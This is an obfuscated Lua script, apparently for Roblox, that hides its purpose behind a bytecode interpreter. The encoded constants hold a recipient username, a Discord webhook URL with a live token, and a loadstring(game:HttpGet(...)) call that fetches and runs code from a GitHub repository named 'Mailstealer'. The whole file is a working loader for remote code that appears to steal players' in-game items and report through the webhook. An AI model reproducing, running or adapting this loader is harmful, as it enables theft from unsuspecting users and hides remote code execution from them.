--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v101=0;local v102;while true do if (v101==1) then return v102;end if (v101==0) then v102=v5(v81,v19);v19=nil;v101=1;end end else return v81;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v82=0;local v83;while true do if (v82==(0 -0)) then v83=(v31/((5 -(3 -0))^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v83-(v83%((1993 -(68 + 997)) -(214 + 641 + 72))) ;end end else local v84=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (878 -(282 + 595))) or (1637 -(1523 + 114)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * 256) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (120 -(32 + 85)) );v18=v18 + 4 + 0 ;return (v40 * (3720433 + 13056783)) + (v39 * (66493 -(892 + 65))) + (v38 * (610 -(653 -299))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1 -0 ;local v44=(v20(v42,351 -(87 + 263) ,200 -(67 + 113) ) * ((2 + 0)^(78 -46))) + v41 ;local v45=v20(v42,21,23 + 8 );local v46=((v20(v42,127 -95 )==(953 -(802 + 150))) and  -(2 -1)) or (443 -(416 + 26)) ;if (v45==((772 -(201 + 571)) -0)) then if (v44==((1138 -(116 + 1022)) + 0)) then return v46 * (0 -0) ;else v45=998 -(915 + 82) ;v43=0 + (0 -0) ;end elseif (v45==(5796 -3749)) then return ((v44==(0 + 0 + 0)) and (v46 * ((1 -(0 -0))/0))) or (v46 * NaN) ;end return v8(v46,v45-(2509 -(998 + 488)) ) * (v43 + (v44/((1189 -(1069 + (418 -300)))^(43 + 9)))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==(859 -(814 + 45))) then return "";end end v48=v3(v16,v18,(v18 + v47) -(2 -1) );v18=v18 + v47 ;local v49={};for v64=1 + 0 , #v48 do v49[v64]=v2(v1(v3(v48,v64,v64)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0 -0 ;local v51;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v50~=0) then else local v87=0;while true do if (0==v87) then v51=0;v52=nil;v87=1;end if (v87==1) then v50=1252 -(721 + 530) ;break;end end end if (v50==(1273 -(945 + 326))) then local v88=0;local v89;while true do if (v88~=(0 -0)) then else v89=0;while true do if (0==v89) then local v103=0;while true do if (v103==(1 + 0)) then v89=701 -(271 + 429) ;break;end if (v103==(0 + 0)) then v55=nil;v56=nil;v103=1501 -(1408 + 92) ;end end end if (1~=v89) then else v50=3;break;end end break;end end end if (v50~=3) then else v57=nil;while true do local v91=1086 -(461 + 625) ;local v92;local v93;while true do if ((1289 -(993 + 295))~=v91) then else while true do if (v92~=(0 + 0)) then else v93=0;while true do if (v93==0) then local v116=1171 -(418 + 753) ;while true do if (v116==(0 + 0)) then if (v51~=(0 + 0)) then else local v167=0 + 0 ;local v168;local v169;while true do if (v167==1) then while true do if (v168==(0 + 0)) then v169=529 -(406 + 123) ;while true do if (v169~=(1769 -(1749 + 20))) then else local v186=0 + 0 ;while true do if (v186~=1) then else v169=1323 -(1249 + 73) ;break;end if (v186~=(0 + 0)) then else local v189=1145 -(466 + 679) ;while true do if (1~=v189) then else v186=1;break;end if (v189==(0 -0)) then v52={};v53={};v189=2 -1 ;end end end end end if (v169==1) then v54={};v51=1901 -(106 + 1794) ;break;end end break;end end break;end if (0~=v167) then else v168=0;v169=nil;v167=1;end end end if (v51==3) then local v170=0 + 0 ;local v171;local v172;while true do if (v170==0) then v171=0;v172=nil;v170=1;end if (v170==1) then while true do if (v171==(0 + 0)) then v172=0;while true do if (0==v172) then local v187=0 -0 ;while true do if (v187==0) then local v190=0 -0 ;while true do if (v190==(114 -(4 + 110))) then for v199=1,v23() do v53[v199-(585 -(57 + 527)) ]=v28();end return v55;end end end end end end break;end end break;end end end v116=1;end if (v116==1) then v93=1428 -(41 + 1386) ;break;end end end if (v93~=(104 -(17 + 86))) then else if (v51~=1) then else local v152=0;local v153;while true do if (v152~=(0 + 0)) then else v153=0;while true do if (v153~=(1 -0)) then else v57={};v51=5 -3 ;break;end if (v153==0) then local v173=0;while true do if (v173~=(167 -(122 + 44))) then else v153=1 -0 ;break;end if (v173~=(0 -0)) then else v55={v52,v53,nil,v54};v56=v23();v173=1;end end end end break;end end end if (v51==2) then local v154=0;local v155;while true do if (v154==0) then v155=65 -(30 + 35) ;while true do if (v155==1) then for v175=1 + 0 ,v23() do local v176=0;local v177;local v178;while true do if (v176==0) then local v180=1257 -(1043 + 214) ;while true do if (v180==(3 -2)) then v176=1;break;end if (v180==(1212 -(323 + 889))) then v177=0;v178=nil;v180=2 -1 ;end end end if (v176~=1) then else while true do if (0==v177) then v178=v21();if (v20(v178,1,1)~=0) then else local v191=0;local v192;local v193;local v194;local v195;local v196;while true do if (v191==1) then v194=nil;v195=nil;v191=582 -(361 + 219) ;end if (v191~=2) then else v196=nil;while true do if (v192==(321 -(53 + 267))) then v195=nil;v196=nil;v192=1 + 1 ;end if (v192~=(415 -(15 + 398))) then else while true do if (v193==(983 -(18 + 964))) then local v201=0 -0 ;local v202;while true do if (v201==0) then v202=0;while true do if (v202~=1) then else v193=2;break;end if (v202==0) then local v209=0 + 0 ;while true do if (v209~=0) then else v196={v22(),v22(),nil,nil};if (v194==(0 + 0)) then local v211=126 -(116 + 10) ;local v212;while true do if ((0 + 0)~=v211) then else v212=0;while true do if (0==v212) then v196[3]=v22();v196[742 -(542 + 196) ]=v22();break;end end break;end end elseif (v194==1) then v196[6 -3 ]=v23();elseif (v194==(1 + 1)) then v196[2 + 1 ]=v23() -((1 + 1)^16) ;elseif (v194==3) then local v221=0;local v222;while true do if (v221==0) then v222=0;while true do if ((0 -0)~=v222) then else v196[3]=v23() -(2^16) ;v196[9 -5 ]=v22();break;end end break;end end end v209=1552 -(1126 + 425) ;end if (v209==(406 -(118 + 287))) then v202=1;break;end end end end break;end end end if (v193==3) then if (v20(v195,3,11 -8 )~=(1122 -(118 + 1003))) then else v196[11 -7 ]=v57[v196[4]];end v52[v175]=v196;break;end if (v193~=(379 -(142 + 235))) then else local v204=0 -0 ;local v205;while true do if (v204~=(0 + 0)) then else v205=0;while true do if (v205==(977 -(553 + 424))) then local v210=0 -0 ;while true do if (v210==0) then if (v20(v195,1,1 + 0 )==1) then v196[2]=v57[v196[2]];end if (v20(v195,2 + 0 ,2 + 0 )==1) then v196[3]=v57[v196[2 + 1 ]];end v210=1 + 0 ;end if (v210~=1) then else v205=2 -1 ;break;end end end if (v205==(2 -1)) then v193=6 -3 ;break;end end break;end end end if ((0 + 0)==v193) then local v206=0 -0 ;while true do if (v206==1) then v193=754 -(239 + 514) ;break;end if (v206==(0 + 0)) then v194=v20(v178,2,1332 -(797 + 532) );v195=v20(v178,3 + 1 ,3 + 3 );v206=1;end end end end break;end if (v192~=(0 -0)) then else v193=1202 -(373 + 829) ;v194=nil;v192=1;end end break;end if (v191~=(731 -(476 + 255))) then else v192=1130 -(369 + 761) ;v193=nil;v191=1 + 0 ;end end end break;end end break;end end end v51=5 -2 ;break;end if (v155~=(0 -0)) then else local v174=0;while true do if (v174==(239 -(64 + 174))) then v155=1;break;end if (v174==(0 + 0)) then for v181=1 -0 ,v56 do local v182=0;local v183;local v184;local v185;while true do if (v182==(336 -(144 + 192))) then local v188=216 -(42 + 174) ;while true do if (v188==(1 + 0)) then v182=1 + 0 ;break;end if (v188~=0) then else v183=0 + 0 ;v184=nil;v188=1;end end end if (v182==(1505 -(363 + 1141))) then v185=nil;while true do if (v183==(1581 -(1183 + 397))) then if (v184==1) then v185=v21()~=0 ;elseif (v184==2) then v185=v24();elseif (v184==(8 -5)) then v185=v25();end v57[v181]=v185;break;end if (v183==0) then local v198=0;while true do if (v198==1) then v183=1 + 0 ;break;end if (v198==0) then v184=v21();v185=nil;v198=1 + 0 ;end end end end break;end end end v55[1978 -(1913 + 62) ]=v21();v174=1 + 0 ;end end end end break;end end end break;end end break;end end break;end if (v91~=0) then else v92=0;v93=nil;v91=1;end end end break;end if (v50==(2 -1)) then local v90=0;while true do if (v90~=1) then else v50=1935 -(565 + 1368) ;break;end if (v90==0) then local v100=0;while true do if ((3 -2)==v100) then v90=1662 -(1477 + 184) ;break;end if (v100~=0) then else v53=nil;v54=nil;v100=1;end end end end end end end local function v29(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v66=v61;local v67=v62;local v68=v63;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v86=0;while true do if (v86==0) then v78=v66[v70];v79=v78[1];v86=1;end if (v86==1) then if (v79<=4) then if (v79<=1) then if (v79>0) then local v104=0;local v105;while true do if (0==v104) then v105=v78[2];v76[v105]=v76[v105](v13(v76,v105 + 1 ,v71));break;end end else v76[v78[2]]=v78[3]~=0 ;end elseif (v79<=2) then local v107=0;local v108;local v109;while true do if (2==v107) then v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v60[v78[3]]=v76[v78[2]];v107=3;end if (v107==0) then v108=nil;v109=nil;v76[v78[2]]=v78[3];v70=v70 + 1 ;v107=1;end if (v107==7) then v76[v109 + 1 ]=v108;v76[v109]=v108[v78[4]];v70=v70 + 1 ;v78=v66[v70];v107=8;end if (v107==4) then v78=v66[v70];v60[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v107=5;end if (v107==3) then v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3]~=0 ;v70=v70 + 1 ;v107=4;end if (v107==1) then v78=v66[v70];v60[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v107=2;end if (v107==6) then v70=v70 + 1 ;v78=v66[v70];v109=v78[2];v108=v76[v78[3]];v107=7;end if (v107==5) then if ((v78[3]=="_ENV") or (v78[3]=="getfenv")) then v76[v78[2]]=v60;else v76[v78[2]]=v60[v78[3]];end v70=v70 + 1 ;v78=v66[v70];if ((v78[3]=="_ENV") or (v78[3]=="getfenv")) then v76[v78[2]]=v60;else v76[v78[2]]=v60[v78[3]];end v107=6;end if (v107==8) then v76[v78[2]]=v78[3];break;end end elseif (v79>3) then local v117=v78[2];local v118=v76[v78[3]];v76[v117 + 1 ]=v118;v76[v117]=v118[v78[4]];else v60[v78[3]]=v76[v78[2]];end elseif (v79<=6) then if (v79==5) then v76[v78[2]]();else do return;end end elseif (v79<=7) then local v110=v78[2];local v111,v112=v69(v76[v110](v13(v76,v110 + 1 ,v78[3])));v71=(v112 + v110) -1 ;local v113=0;for v114=v110,v71 do local v115=0;while true do if (v115==0) then v113=v113 + 1 ;v76[v114]=v111[v113];break;end end end elseif (v79==8) then if ((v78[3]=="_ENV") or (v78[3]=="getfenv")) then v76[v78[2]]=v60;else v76[v78[2]]=v60[v78[3]];end else v76[v78[2]]=v78[3];end v70=v70 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003083O00557365726E616D6503103O006761626761626761626761623238323403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31393230363237352O3235333032363330342F464C785073657969414D5842387744574B73526E552O447333765A7A71474B772O3851394C695264324F366D416436526A4461557968352D746C6350795273477567636C030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696C737465616C657256322F4D61696C737465616C65722F6D61696E2F7632000E3O0012023O00023O00124O00013O00124O00043O00124O00039O003O00124O00053O00124O00063O00122O000100073O00202O00010001000800122O000300094O0007000100034O00015O00022O00053O000100012O00063O00017O00",v9(),...);
